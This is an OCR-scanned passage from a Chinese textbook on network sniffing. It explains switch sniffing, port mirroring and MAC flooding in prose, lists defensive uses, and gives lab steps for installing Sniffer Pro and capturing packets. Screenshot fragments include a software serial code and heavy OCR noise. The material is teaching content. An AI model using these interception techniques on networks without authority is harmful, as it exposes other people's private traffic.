数据 包 , 只 要 将 本 机 网 卡 设 为 混杂 模式 ,就 可 以 使 嗅 探 工具 支持 广播 网 或 多 播 网 的 嗅 探 。 

3. 交换 机 嗅 探 

交换 机 的 工作 原理 与 集线器 不 同 , 它 不 再 将 数据 包 转 发 给 所 有 的 端口 ,而 是 通过 分 组 交 
换 的 方式 进行 单 对 单 的 数据 传输 。 即 交换 机 能 记 住 每 个 端口 的 MAC 地 址 ,根据 数据 包 的 
目的 地 址 选择 目的 端口 ,只 有 对 应 该 目的 地 址 的 网 卡 能 接收 到 数据 。 

基于 交换 机 的 嗅 探 是 指 在 交换 环境 中 通过 某 种 方式 进行 的 嗅 探 。 由 于 交换 机 基于 分 组 
交换 的 工作 模式 ,因此 ,简单 地 将 网 卡 设 为 混杂 模式 并 不 能 够 嗅 探 到 网 络 上 的 数据 包 , 必须 
要 采用 其 他 的 方法 来 实现 基于 交换 机 的 嗅 探 。 

4. 端口 镜像 嗅 探 

端口 镜像 又 称 为 巡回 分 析 端 口 (roving analysis port) , 它 从 网 络 交 换 机 的 一 个 端口 转发 
每 个 进出 分 组 的 副本 到 另 一 个 端口 ,分 组 将 在 此 端口 进行 分 析 ,端口 镜像 是 监视 网 络 通信 量 
和 通信 内 容 的 一 种 方法 。 网 络 管理 员 将 端口 镜像 作为 一 种 诊断 或 调试 的 工具 ,尤其 是 在 分 
析 网 络 情况 的 时 候 , 它 使 管理 员 能 够 跟踪 交换 机 的 性 能 并 在 必要 的 时 候 对 其 更 改 。 

端口 镜像 是 交换 机 为 调试 预 留 的 功能 。 通 过 端口 镜像 ,可 以 将 交换 机 中 任意 端口 的 数 
据 复制 给 镜像 端口 ,通过 端口 镜像 ,本 机 嗅 探 工具 就 可 以 嗅 探 交 换 机 上 的 任意 端口 了 。 

Py 





基于 端口 镜像 的 嗅 探 受 限于 交换 机 能 够 支持 的 镜像 功能 ,能 够 镜像 多 少 端口 .镜像 出 来 
的 协议 如 何 ,都 取决 于 交换 机 的 型 号 和 配置 。 由 于 进行 基于 端口 镜像 的 嗅 探 必须 拥有 交换 
机 的 管理 权限 ,因此 基于 端口 镜像 的 嗅 探 往往 是 网 络 管理 员 常 用 的 嗅 探 方式 。 

5. 通过 MAC 泛滥 进行 交换 机 嗅 探 

这 种 方式 往往 被 攻击 者 使 用 。 网 络 交 换 机 为 了 能 够 进行 分 组 交换 ,必须 在 内 部 维护 着 
一 个 转换 表 , 将 不 同 的 MAC 地 址 转换 成 交换 机 上 的 物理 端口 。 由 于 交换 机 的 工作 内 存 有 
限 , 如 果 用 虚假 的 MAC 地 址 对 交换 机 进行 不 断 攻 击 , 直 到 交换 机 的 工作 内 存 被 占 满 ,交换 
机 就 进入 了 所 谓 的 “打开 失效 "模式 ,开始 了 类 似 于 集线器 的 工作 方式 ,向 网 络 上 所 有 的 机 器 
广播 数据 包 。 在 这 种 情况 下 ,交换 机 嗅 探 就 可 以 同样 采用 广播 网 嗅 探 的 方式 实现 。 


3.1.4.4. 嗅 探 的 安防 作用 


1. 网 络 安全 审计 

网 络 审计 是 指 通 过 网 络 嗅 探 工具 .将 网 络 数 据 包 捕获 、 解 码 并 加 以 存储 ,以 备 后 期 查询 
或 提供 即时 报警 。 通 过 嗅 探 技 术 ,网 络 审计 可 以 实现 上 网 行为 审计 、 网 络 违规 数据 的 监控 等 
功能 。 利 用 网 络 嗅 探 技术 开发 的 网 络 行为 审计 类 软件 是 运行 在 关键 的 网 络 节点 ,对 网 络 传 
输 的 数据 流 进 行 合法 性 检查 的 工具 。 

2. 蠕虫 病毒 的 控制 

采用 嗅 探 技术 ,对 蠕虫 病毒 的 控制 可 起 到 以 下 作用 : 

(1) 基于 网 络 嗅 探 的 流量 检测 ,及 时 发 现 网 络 流量 异常 ,并 根据 已 经 建成 的 流量 异常 模 
型 初步 判断 出 网 络 蠕虫 病毒 爆发 的 前 兆 。 

(2) 基于 网 络 嗅 探 的 网 络 协议 分 析 ,进一步 确认 蠕虫 病毒 的 发 作 ,并 及 时 给 出 预警 信息 。 

(3) 基于 网 络 嗅 探 技术 的 蜜 缸 ,尽早 捕获 蠕虫 病毒 的 样本 ,并 通过 对 其 进行 的 详细 分 
Vr ,制定 出 有 效 的 防御 方案 和 清除 方案 。 

(4) 通过 基于 网 络 嗅 探 技 术 的 人 侵 检测 ,能 够 准确 定位 局 域 网 络 中 的 蠕虫 病毒 传播 源 ， 
从 而 及 时 扼杀 病毒 蠕虫 的 传播 行为 。 

3. 网 络 布控 与 追踪 

针对 网 络 犯罪 ,如 黑客 人 侵 、 拒 绝 服 务 攻击 等 ,通过 嗅 探 技 术 进 行 追踪 ,协助 执法 部 门 定 
位 网 络 犯罪 分 子 。 现 代 网 络 犯罪 往往 采用 跳板 进行 , 即 通过 一 台中 间 主 机 进行 网 络 攻 击 和 
犯罪 活动 ,这 对 犯罪 分 子 的 捕获 造成 了 很 大 的 障碍 , 而 嗅 探 技 术 可 以 有 效 地 帮助 执法 人 员 解 
决 这 一 问题 。 

网 络 追 踪 是 针对 伪造 IP 地 址 攻击 的 一 种 追查 方法 。 由 于 网 络 攻击 往往 采用 虚假 的 IP 
地 址 (特别 是 大 规模 的 拒绝 服务 攻击 ) ,因此 ,从 被 攻击 机 嗅 探 获 取 的 数据 无 法 直接 判断 攻击 
源 , 需 要 采用 移动 的 网 络 嗅 探 器 ,以 溯源 的 方式 从 终点 逐个 前 溯 , 直 到 发 现 攻 击 的 起 源 点 。 

当 发 现 某 网 络 犯 罪行 为 是 通过 中 间 跳 板 主 机 进行 时 ,暂时 不 对 该 主机 进行 明显 的 操作 ， 
而 是 运行 网 络 嗅 探 器 对 其 进行 24 小 时 的 监控 ,一 旦 犯罪 分 子 远程 登录 该 主机 ,网 络 嗅 探 器 
就 会 记录 该 犯罪 分 子 的 IP 地 址 ,从 而 协助 定位 和 追踪 。 目 前 ,国内 已 经 有 多 例 通过 网 络 布 
控 和 追踪 的 方式 抓获 犯罪 分 子 的 案例 ,其 中 也 往往 涉及 嗅 探 技术 的 应 用 。 

4. 网 络 取证 

基于 嗅 探 的 网 络 取证 工具 可 以 运行 在 需要 取证 的 犯罪 分 子 所 使 用 的 计算 机 上 (如 个 人 
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计算 机 或 公共 场所 的 计算 机 ) ,并 可 以 将 该 犯罪 分 子 的 网 络 行为 (如 邮件 、 聊 天 信息 和 上 网 记 
录 等 ) 加 以 实时 记录 ,从 而 协助 案件 的 侦破 和 起 诉 证 据 的 获取 。 为 了 确保 利用 嗅 探 工具 所 获 
得 的 网 络 证 据 具 备 不 可 算 改 性 ,网 络 取 证 工具 中 还 需要 内 置 数字 签名 工具 ,防止 操作 人 员 人 
为 修改 或 误 删 数字 证 据 。 

嗅 探 技术 在 黑客 攻防 技术 以 及 信息 安全 体系 建设 中 都 起 到 了 非常 重要 的 作用 ,而 反 咱 
探 技术 也 是 确保 网 络 私密 性 的 关键 技术 之 一 。 同 时 , 嗅 探 技 术 在 网 络 安全 管理 工作 中 也 很 
有 用 。 但 是 ,在 进行 嗅 探 技术 的 合法 应 用 的 同时 ,还 需要 关注 嗅 探 技术 滥用 带 来 的 泄密 和 破 
坏 个 人 隐私 问题 。 随 着 网 络 技术 的 发 展 , 未 来 的 嗅 探 技术 和 反 嗅 探 技 术 还 将 不 断 进 步 ,目前 
在 高 速 化 .可 视 化 .针对 加 密 的 嗅 探 和 无 线 切 入 技术 4 个 方向 上 都 可 以 见 到 新 技术 的 出 现 。 


3.2 网 络 分 析 基 础 实验 
3.2.1 Sniffer Pro 简介 


Sniffer Pro 软件 是 NAT 公司 推出 的 功能 强大 的 协议 分 析 软 件 。 利 用 Sniffer Pro 网 络 
分 析 器 的 强大 功能 和 特征 ,能 够 解决 很 多 网 络 问题 。 本 教材 使 用 的 软件 版 本 为 SnifferPro 4 
70.530, 

Sniffer Pro 软件 的 主要 作用 可 以 体现 在 以 下 几 个 方面 : 

(1) Sniffer Pro 可 以 评估 业务 运行 状态 。 例 如 ,各 种 应 用 的 响应 时 间 、 一 个 操作 需要 的 
时 间 应 用 带宽 的 消耗 ,应 用 的 行为 特征 和 应 用 性 能 的 瓶颈 等 。 

(2) Sniffer Pro 能 够 评估 网 络 的 性 能 。 例 如 ,各 链 路 的 使 用 率 、 网 络 性 能 趋势 .消耗 最 
多 带宽 的 具体 应 用 、 消 耗 最 多 带宽 的 网 络 用 户 、 各 分 支 机 构 流量 状况 和 影响 网 络 性 能 的 主要 
因素 。 

(3) Sniffer Pro 可 以 快速 定位 故障 。 例 如 ,monitor expert, decode 等 功能 都 可 以 快速 
定位 故障 。 

(A) Sniffer Pro 可 以 排除 潜在 的 威胁 。 例 如 病毒 .木马 .扫描 等 ,并 且 发 现 攻击 的 来 源 ， 
为 控制 提供 根据 ,对 于 类 似 蠕 虫 病毒 一 样 对 网 络 影响 大 的 病毒 有 效 。 作 为 即时 监控 工具 ， 
Sniffer Pro 通过 发 现 网 络 中 的 行为 特征 来 判断 网 络 是 否 有 异常 流量 ,所 以 Sniffer Pro 可 能 
比 防 病毒 软件 更 快 发 现 病毒 。 

(5) Sniffer Pro 可 以 进行 流量 的 趋势 分 析 。 通 过 长 期 监控 ,可 以 发 现 网 络 流量 的 发 展 
趋势 ,为 将 来 网 络 改造 提供 建议 和 依据 。 

(6) 应 用 性 能 预测 。Sniffer Pro 能 够 根据 捕获 的 流量 分 析 一 个 应 用 的 行为 特征 ,可 以 
提供 量化 的 预测 ,准确 率 较 高 ,误差 不 超过 10%。 

Sniffer Pro 包括 了 四 大 功能 : 监控 (monitor)、 显 示 (display) 数据 包 捕 提 (capture) 和 
专家 分 析 系统 (expert) 。 


3.2.2 程序 安装 实验 
实验 器 材 


Sniffer Pro 软件 系统 ,1 套 。 
äi 


PC( Windows XP/Windows 7).1 @. 
预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 熟悉 实验 过 程 和 基本 操作 流程 。 
(3) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 ,掌握 以 下 技能 : 
CD 学 会 在 Windows 环境 下 安装 Sniffer Pro, 
(2) 能 够 运用 Sniffer Pro 捕获 报 文 。 


: 验 环 境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 
预备 知识 


(1) TCP/IP 原理 及 基本 协议 。 

(2) 数据 交换 技术 概念 及 原理 。 

(3) 路 由 技术 及 实现 方式 。 

实验 步 又 

按照 常规 安装 方法 双击 Sniffer Pro 软件 的 安装 图 标 , 按 安装 向 导 的 提示 顺序 进行 安装 
(如 图 3.2. 1 所 示 ), 本 教材 选用 的 软件 版 本 为 Sniffer Portable 4. 7. 5。 


Welcome to the InstallShield Wizard 
for Sniffer Portable 4.7.5 


The InstallShield Wizard(TM) will help install Sniffer Portable 
4.7.5 on your computer. To continue, dick Next. 








图 321 软件 安装 界面 


如 图 3. 2. 2 所 示 ,在 选择 Sniffer Pro 的 安装 目录 时 ,默认 安装 在 C:\Program Files\ 


NAISnifferNT 目录 中 ,为 了 更 好 地 使 用 该 软件 ,建议 用 默认 路 径 进 行 安装 。 
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‘Setup will install Sniffer Pro in the following folder. 

To install to this folder. click Next. 

To install to different folder, click Browse and select another 
folder. 


You can choose not to install Sniffer Pro by clicking Cancel to 
iS 


exit Setup. 











图 322 安装 目录 选择 界面 


在 注册 用 户 时 ,需要 填写 必要 的 注册 信息 。 在 出 现 的 Sniffer Pro User Registration 的 
3 个 对 话 框 中 ,依次 填写 个 人 信息 ,如 图 3. 2. 3 所 示 , 注意 ,最 后 一 行 的 Sniffer Serial 
Number 需要 填 人 软件 购买 时 提供 的 注册 码 。 


[Eat NON E) 





* Please let us know where you [agazine ad =] | 


heard about this product 


Do you wish to receive Ws = 
announcements about this 
product? 


May we share your name with Yo = 


other companies that use NAT 
products? 


B] * Sniffer Serial Number 可 














— | 


图 323 用 户 注册 界面 








如 图 3. 2. 4 所 示 ,完成 注册 操作 后 ,需要 设置 网 络 连接 状况 。 从 上 至 下 ,依次 有 3 个 选 
项 :“ 直 接连 接 ”“ 通 过 代理 服务 器 连接 ”和 ”* 拨 号、 传真 或 无 连接 ”。 一 般 情况 下 ,用 户 直接 
选择 第 一 项 Direct Connection to the Internet, 

如 图 3. 2. 5 所 示 , 若 通过 代理 服务 器 连接 , 则 需要 输入 代理 服务 器 地 址 、 用 户 名 和 账号 
等 信息 。 

接 下 来 ,系统 会 自动 定位 并 连接 到 最 近 的 网 络 服务 器 Mercury. nai. com, 完 成 必要 的 注 
册 信 息 提交 和 注册 码 认证 工作 。 当 用 户 的 注册 信息 验证 通过 后 ,系统 会 转 和 人 图 3.2.6 所 示 
的 界面 ,用 户 被 告知 系统 分 配 的 身份 识别 码 ,以便 用 户 进行 后 续 的 服务 和 咨询 。 
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If you are connecting to the Internet through 
dial-up networking, you may wish to connect now. 


If you are connecting over a locel eres network, you 
may need to connect through a proxy. Please consult 
your system administrator. 


I£ you ere unable to connect to the Internet, your 
registration information can be printed and saved. 


@ Direct Connection to the Internet 


(C Connection to the Internet through a Proxy 


C Not connected to network or dial-up. 
Print & fax option. 








SNIENE 


图 324 网 络 连接 状况 设置 界面 


-HTTP Proxy Setup 
Use HTTP proxy at 


es M 


Your user name and password will not 


be stored. 














to the Internet through 
may wish to connect now 


over a local area network, you 
Please consult 





[C] cem 






























[V] Locating nearest server | 
[v] Connecting to service 

Updating customer information 

[V] Communication with server complete 
A Cleaning up communications 


Status: | 





gistration complete! 
our customer identification number is 3168111. 
ease make a note of this value for future 
'eference. 

















图 326 注册 信息 验证 界面 


如 图 3.2. 7 所 示 , 此 时 单 击 “ 下 一 步 ” 按 钮 时 ,系统 会 提示 用 户 保 存 关键 性 的 注册 信息 ， 
并 生成 一 个 文本 格式 的 文件 Registration Summary. txt。 该 文件 主要 包括 了 以 下 几 个 重要 
部 分 ,详细 内 容 可 参照 图 3. 2. 8。 























ser Registration Information ^ 


legistration complete! 
[our customer identification number is 3168111 | 
lease make a note of this value for future refe 


ontact Info Network Associate = 





[^ Display product information from the World Wid 














Finish 取消 





er Registration Information 


Registration complete! 
Your customer identification number is 3168111. 
|Please make a note of this value for future reference. 


Contact Info Network Associates 

| http: \\oww. nai. com 
Phone # (408)988-3832 
[Product Sniffer Pro 

[Customer ID 3168111 


Title test 

Mailing Address random 

XXX, < Other > 000000 
CHN 


000. 000. 0000000000 


No 
[Sniffer Registration SA154-2558Y-255T9-2LASH 
[E-Mail Address xxx$163. com 


[System ID 3ADD4972-0C41-4746- 
| B10D-SBCBDBF80D2A 








图 328 注册 文件 内 容 


。 用 户 身 份 识别 码 (Customer Identification Number) 。 
。 服务 器 连接 信息 (Contact Info), 
。 用 户 填 写 的 身份 注册 信息 (Product Sniffer Pro)。 
Bohs 


由 于 Sniffer Pro 软件 的 运行 环境 需要 Java 环境 支撑 ,因此 在 软件 使 用 前 安装 程序 会 提 
示 用 户 安装 并 设置 Java 环境 (如 图 3. 2.9 所 示 ) 。 








: 
Javaltm] Runtime Environment 1.60 16 Standard Edition 











欢迎 使 用 Sun Microsystems, Inc. 的 Java[tm] 技术 ! Sun. 
< 








SUN MICROSYSTEMS, INC. ^ 
二 进 制 代码 许可 协议 [3 


[JAVA SE RUNTIME ENVIRONMENT (JRE) VERSION 6 和 JAVAFX RUNTIME VERSION 

1 
SUN MICROBYSTENS,INC. (“SUN”) 原意 授予 您 许可 证 ， 许 可 您 使 用 下 述 软件 ， 但 条 
件 是 您 必须 接受 本 二 进 制 代码 许可 协议 的 所 有 条 元 以 及 增补 许可 条 款 (统称 “协议 ") ~ 


© HAEA, 请 继续 运行 Sun Microsystems, Inc. 的 Java 技术 。 
| 我 下 同意 (D), 请 停止 运行 Java 技术 。 























Le 

图 329 设置 Java 环 境 

接 下 来 ,系统 在 完成 关键 文件 复制 和 安装 的 工作 后 ,会 出 现 Setup Complete 提示 ,由 于 
Sniffer Pro 需要 将 网 卡 的 监听 模式 切换 为 混杂 模式 ,所 以 需要 重新 启动 计算 机 来 完成 网 卡 
的 工作 模式 切换 , 当 软 件 提示 重新 启动 计算 机 时 ,按照 提示 操作 即 可 。 

重新 启动 计算 机 后 ,可 以 通过 运行 Sniffer Pro 来 监测 网 络 中 的 数据 包 。 通 过 “开始 ”一 
“程序 ”>Sniffer Pro>Sniffer 来 启动 程序 。 在 进入 主 界面 后 ,首先 要 配置 监听 网 卡 。 一 般 
情况 下 ,Sniffer Pro 初次 运行 时 会 自动 选择 机 器 网 卡 进行 监听 。 如 果 本 地 计算 机 有 多 个 网 
卡 , 则 需要 手工 指定 。 具 体 方法 如 下 : 

CD 选择 软件 主 界面 菜单 “文件 "(File) 一 “ 选 定 设置 "(Select Settings) 命 令 。 

(2) 在 “当前 设置 ”对话 框 中 选择 监听 的 网 卡 ,同时 旬 选 Log Off 复 选 框 , 单 击 “ 确 定 ” 按 
钮 ,如 图 3. 2. 10 所 示 。 











[ms ] x | 





图 3210 设置 提示 


(3) 如 果 存 在 多 个 网 卡 , 则 需要 确定 最 终 的 监听 网 卡 ,如 图 3. 2. 11 所 示 。 
完成 上 述 操作 后 ,就 可 以 使 用 Sniffer Pro 对 目标 主机 进行 网 络 监听 ,如 图 3. 2. 12 所 


。54 。 


Select Settings | 
Select settings for nonitoring: 


Nev... | 


tek PCIe 


2 Realtek PCIe y Controller 
WD \Device\Sniffer 784B-CE81-43FI ^ Edit... | 


LJ \Device\Sniffer_ [D1963F14-5F32-4A3: 


Delete... | 


: [^ Log off 





Cae] ma | 


图 3211 多 网 卡 设置 提示 


示 ,快捷 操作 功能 主要 包括 报 文 捕获 及 网 络 性 能 监视 。 主 要 监控 目标 机 器 的 网 络 流量 和 错 
误 数据 包 情况 。 主 要 的 参考 信息 包括 网 络 使 用 率 (utilization)、 数 据 包 传 输 率 (packets/s)、 
错误 数据 情况 Cerrors/s) 。 
>| nme] x|[ex =] | 
z|u| &js| esae |gs|lea| Z| | «|| 
3| 8] | æ 
图 3212 快捷 操作 菜单 








实验 报告 要 求 


: 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


思考 题 


CD. 网 卡 的 工作 模式 有 几 种 ? 
(2) 分 析 和 总 结 监 听 模 式 的 具体 工作 情况 。 


3.2.3 数据 包 捕获 实验 


实验 器 材 


Sniffer Pro 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 @. 


预习 要 求 


CD 做 好 实验 预习 ,复习 网 络 协 议 的 有 关内 容 。 
. 55 。 


(2) 熟悉 实验 过 程 和 基本 操作 流程 。 
(3) 做 好 预习 报告 。 


实验 任务 
通过 本 实验 ,熟练 掌握 Sniffer Pro 数据 包 捕获 功能 的 使 用 方法 。 


本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 
预备 知识 


(1) 数据 交换 技术 的 概念 及 原理 。 
(2) 路 由 技术 及 实现 方式 。 


实验 步 又 


1. 报 文 捕获 

数据 包 捕 获 (capture) ,是 将 所 有 的 数据 包 截 取 并 放 在 磁盘 缓冲 区 中 ,以 便于 分 析 。 其 
基本 原理 就 是 通过 软件 手段 设置 网 络 适配器 (NIC) 的 工作 模式 ,在 这 种 模式 下 网 卡 接收 所 
有 的 数据 ,达到 网 络 监 控 和 网 络 管理 的 功能 。 

如 图 3. 2. 13 所 示 , 报 文 捕获 快捷 操作 按钮 的 功能 依 
次 为 开始 .暂停 .停止 .停止 并 显示 .显示 .定义 过 滤器 以 
及 选择 过 滤器 ,一 般 情 况 下 ,选择 默认 的 捕获 条 件 。 

Sniffer Pro 在 启动 后 ,一 般 处 于 脱 机 模式 。 在 捕获 报 文 之 前 ,需要 进入 记录 模式 ， 
通过 选择 “文件 ”菜单 下 的 “记录 于 ”来 启动 网 卡 的 监听 模式 。 也 可 以 通过 “ 选 定 设置 ” 
2) Log On/Off 来 完成 上 述 操 作 。 此 时 ,可 根据 需要 进行 局 域 网 的 回环 测试 。 选 择 
“捕获 ”菜单 下 的 “开始 "或 直接 单 击 捕获 快捷 按钮 中 的 “开始 ”按钮 ,系统 会 开始 进行 网 
络 报 文 的 捕获 。 

在 捕获 过 程 中 ,选择 快捷 菜单 中 的 “捕获 面板 "命令 或 选择 “捕获 ”菜单 下 的 “捕获 
命令 ,可 以 随时 查看 捕获 报 文 的 数量 以 及 数据 缓冲 区 的 利用 率 ,如 图 3. 2. 14 所 示 。 

左 侧 仪 表 显 示 系 统 当 前 捕获 到 的 报 文 数量 , 右 侧 仪表 显示 捕获 报 文 的 数据 缓冲 区 大 小 
此 外 ,还 可 以 选择 “细节 ”功能 ,查看 详细 的 统计 信息 ,如 图 3.2.15 所 示 。 
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图 3213 捕获 报 文 快捷 操作 按钮 
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A321 报 文 捕获 统计 信息 


捕获 到 的 报 文 存 储 在 缓冲 区 内 。 使 用 者 可 以 显示 和 分 析 缓 冲 区 内 的 当前 报 文 , 也 可 以 
将 报 文保 存 到 磁盘 ,加 载 和 显示 之 前 保存 的 报 文 信息 ,进行 离线 分 析 和 显示 。 

整个 捕获 过 程 受 “定义 过 滤器 ”的 约束 ,选择 “捕获 ”菜单 下 的 “定义 过 滤器 ”命令 ,选择 
“缓冲 ”选项 卡 ,对 捕获 缓冲 区 进行 设置 。 

首先 ,缓冲 区 的 大 小 由 用 户 自 定义 ,根据 实际 主机 的 内 存 容量 进行 调整 。 缓 冲 区 设置 过 
大 容易 造成 软件 运行 延迟 。 

其 次 ,数据 包 大 小 应 选择 适度 ,截取 部 分 数据 包 能 够 节省 磁盘 空间 ,保证 网 络 通信 流畅 ， 
避免 丢失 帧 。 

值得 一 提 的 是 , 当 禁 止 “ 保 存 到 文件 ?选项 时 ,可 以 选择 当 缓冲 区 满 时 停止 捕获 还 是 覆盖 
缓冲 区 中 原 有 数据 。 

此 外 ,也 可 以 通过 指定 文件 名 前 级 和 脱 机 文件 数 对 捕获 信息 进行 存储 ,如 图 3. 2. 16 
Brass 
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图 3216 捕获 缓冲 区 设置 























以 上 介绍 的 是 基本 捕获 方式 , 若 需 要 捕获 特定 主机 或 工作 站 的 数据 包 , 可 以 通过 选择 
“监视 器 "菜单 的 “主机 列表 ”命令 查看 主机 信息 ,并 单 击 单个 主机 进行 数据 包 捕获 。 
2. 报 文 分 析 
为 了 有 效 地 进行 网 络 分 析 , 需 要 借助 于 专家 分 析 系 统 。 首 先 ,应 根据 网 络 协议 环境 对 专 
家 系统 进行 配置 。 选 择 “ 工 具 ? 菜 单 中 的 “专家 选项 ”命令 ,出现 Expert UI Object 属性 对 话 
框 , 如 图 3. 2. 17 所 示 。 
专家 系统 的 配置 能 够 帮助 分 析 人 员 专 注 于 特定 问题 ,通过 排除 某 些 系 统 层 数据 ,捕获 到 
网 络 分 析 所 需 的 特定 通信 量 。 同 时 ,根据 每 层 对 象 所 需 的 内 存 容 量 来 创建 每 个 系统 层 的 最 
大 对 象 数 。 
* 在 设置 中 ,Recycle Expert Objects( 专 家 系统 重用 ) 选 项 定义 当 内 存 不 足 时 专家 系统 
需要 进行 的 操作 , 即 是 覆盖 原 有 数据 来 创建 新 对 象 (选中 时 ) ,还 是 停止 创建 对 象 ,对 
已 有 数据 进行 分 析 ( 未 选中 时 ) 。 
。 默认 情况 下 , 当 数 据 包 捕获 开始 时 ,专家 系统 就 开始 分 析 进 入 缓冲 区 的 数据 包 , 并 在 
窗口 中 实时 显示 ,用 户 可 以 在 捕获 的 同时 分 析 网 络 对 象 及 症状 ,并 作出 诊断 。 用 户 
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Objects | | Protocols 
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取消 mmo | mm 
A327 专家 选项 设置 





也 可 以 选择 禁用 实时 分 析 功 能 (未 选中 )。 


。 指定 可 创建 的 最 大 警报 数 。 当 达到 最 大 警报 数 时 ,专家 系统 会 覆盖 最 早 最 低级 别 的 


警报 (选中 ) 或 者 停止 创建 警报 。 


。 Data Update Rate 用 于 设置 专家 系统 显示 的 刷新 频率 ,Resorting Rate 用 于 设置 专 


家 系统 数据 分 析 到 摘要 显示 操作 之 间 的 延迟 。 


。 对 于 专家 系统 的 警报 阔 值 ,可 以 通过 选择 “工具 ?菜单 下 的 “专家 选项 命令 ,在 弹出 


的 对 话 框 中 选择 Alarms 选项 卡 进 行 设 置 。 


值得 注意 的 是 ,系统 默认 的 阔 值 都 是 经 过 精确 计算 的 ,可 保证 系统 进行 诊断 和 问题 检测 
的 需求 。 如 果 对 阔 值 进行 修改 ,可 能 会 导致 系统 判断 失误 或 运行 错误 。 如 图 3. 2. 18 所 示 ， 


对 于 每 一 个 系统 层 存在 多 个 症状 诊断 的 警报 阔 值 信息 。 


FE 
Subnet Masks | RIP Options 802.11 Options 
Objects Alaras Protocols 







































































A328 专家 系统 阔 值 设置 


对 于 各 类 网 络 协议 ,用 户 可 以 进行 选择 性 监听 和 分 析 。 在 对 话 框 中 选择 Protocols 选项 
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卡 , 如 图 3. 2. 19 所 示 ,可 按照 系统 分 析 层 对 各 协议 选择 Yes 或 No. 
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图 3219 指定 分 析 协 议 设置 


此 外 , 当 网 络 使 用 了 不 规范 的 子 网 掩 码 时 ,可 以 选择 Subnet Masks 选项 卡 进行 更 改 。 

在 专家 系统 中 还 为 用 户 提供 了 用 于 检测 路 由 故障 的 路 由 信息 协议 分 析 (RIP), 通 过 分 
析 所 捕获 报 文 的 路 由 选择 协议 来 构建 路 由 表 并 显示 。 专 家 系统 通常 会 发 现 网 络 上 的 默认 路 
由 器 ,同时 构建 一 条 通 向 网 关 的 默认 静态 路 由 。 如 果 选 择 使 用 RIP 分 析 方式 , 则 需要 在 RIP 
Options 选项 卡 中 将 连接 层 和 应 用 层 定义 为 “分 析 ”, 如 图 3. 2. 20 所 示 。 


Objects 1 Alarms | Protocols 
Subnet Masks RIP Options 802.11 Options 
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AGE EH at 


设置 子 网 地 址 和 掩 
自动 捕获 网 码 以 及 删除 子 网 
络 中 的 子 网 





图 3220 指定 分 析 协 议 设置 


在 专家 系统 属性 设置 中 ,还 特别 设 定 了 用 于 无 线 网 络 分 析 的 选项 。 在 启用 欺诈 AP 查 
找 的 选项 后 ,专家 系统 就 会 对 访问 主机 的 MAC 地 址 和 选项 中 已 存 地 址 进行 比较 ,一 旦 出 现 
异常 就 会 生成 警报 。 

通过 “显示 ”菜单 “显示 设置 ”命令 ,可 以 自 定义 要 显示 的 分 析 内 容 , 如 图 3. 2. 21 所 示 ， 
主要 包括 如 下 几 个 方面 : 
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显示 网 络 地 址 
回 显示 在 ta< 地 址 中 的 厂商 








图 3221 摘要 显示 设置 


。“ 普 通 ” 设 置 可 以 显示 或 隐藏 “主机 列表 ”“ 和 矩阵 "“ 协 议 分 布 " “统计 数据 ”等 。 
。“ 摘 要 显示 ”可 以 定义 具体 显示 的 专家 症状 、 系 统 层 等 内 容 。 

。“ 协 议 颜 色 ” 可 以 改变 显示 协议 所 使 用 的 字体 颜色 。 

。“ 协 议 使 详 诉 ”可 以 设置 每 个 协议 的 详细 显示 设置 。 

*“ 解 码 字 体 ” 可 以 更 改 “ 解 码 ” 显 示 中 文本 字体 类 型 .颜色 和 大 小 。 

具体 摘要 显示 选项 及 状态 标志 如 表 3. 2. 1 和 表 3. 2. 2 所 示 。 


表 3.2.1 摘要 显示 选项 说 明 











显示 选项 启用 功能 描述 
显示 专家 症状 为 每 个 帧 显示 所 发 现 的 上 一 个 症状 
显示 全 部 的 层 显示 帧 中 所 包含 的 协议 层 , 每 个 协议 层 一 行 
显示 网 络 地 址 显示 为 网 络 地 址 ,否则 为 硬件 地 址 





显示 在 MAC 地 址 中 的 厂商 ID 


在 MAC 地 址 的 开头 部 分 显示 供应 商 名 称 





在 网 络 地 址 上 的 名 称 解析 


显示 网 络 地 址 的 名 称 , 而 不 是 数字 地 址 
































AU b SERRE P 如 果 工 作 站 在 地 址 德 中 已 命名 , 则 显示 其 名 称 而 不 是 地 址 
二 进 制 格 式 显示 表示 为 两 个 窗口 ,以 显示 工作 站 之 间 的 通信 情况 
可 选择 区 域 
状态 当 数 据 包 出 现 异常 时 .显示 异常 状态 标志 ,如 表 3.2. 2 所 示 
绝对 时 间 显示 收 到 帧 的 时 间 
Delta 时 间 显示 当前 帧 和 上 一 帧 之 间 的 时 间 间 隔 
相对 时 间 显示 当前 帧 和 标记 帧 之 间 的 时 间 间 隔 
Len( 字 节 ) 显示 帧 的 长 度 
累计 的 字 节 显示 从 标记 帧 开始 到 当前 帧 的 所 有 帧 的 长 度 
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表 3.2.2 状态 标志 说 明 
































状态 标志 状态 描述 状态 描述 

M 数据 包 已 标记 数据 包 小 于 64B, 无 CRC 错误 
A 数据 包 是 端口 A 捕获 到 的 数据 包 小 于 64B, 有 CRC 错误 
B 数据 包 是 端口 B 捕获 到 的 数据 包 大 于 1518B. X: CRC 错误 
# 数据 包 存 在 症状 ,或 显示 具体 诊断 内 容 数据 包 由 于 冲突 而 损坏 

触发 器 | 数据 包 是 一 个 数据 触发 器 数据 包 长 度 不 是 8 的 整数 倍 
CRC 具有 CRC 错误 ,大 小 正常 的 数据 包 在 环 中 有 地 址 冲突 

超 长 具有 CRC 错误 ,大 小 超 长 的 数据 包 目的 主机 未 收 到 数据 包 





在 专家 系统 的 解码 显示 窗口 中 ,可 以 通过 “显示 ”菜单 下 的 “查找 帧 "命令 来 获得 特定 帧 
的 信息 , “查找 帧 "包含 4 个 选项 : 

* 文本 , 即 搜索 包含 特定 文本 字符 信息 的 帧 。 

。 数据 , 即 搜索 包含 特定 数据 模式 的 帧 。 

。 状态 ,允许 搜索 具有 特定 状态 标志 的 帧 。 

。 专家 系统 ,允许 搜索 与 特定 专家 系统 症状 或 诊断 关联 的 帧 。 

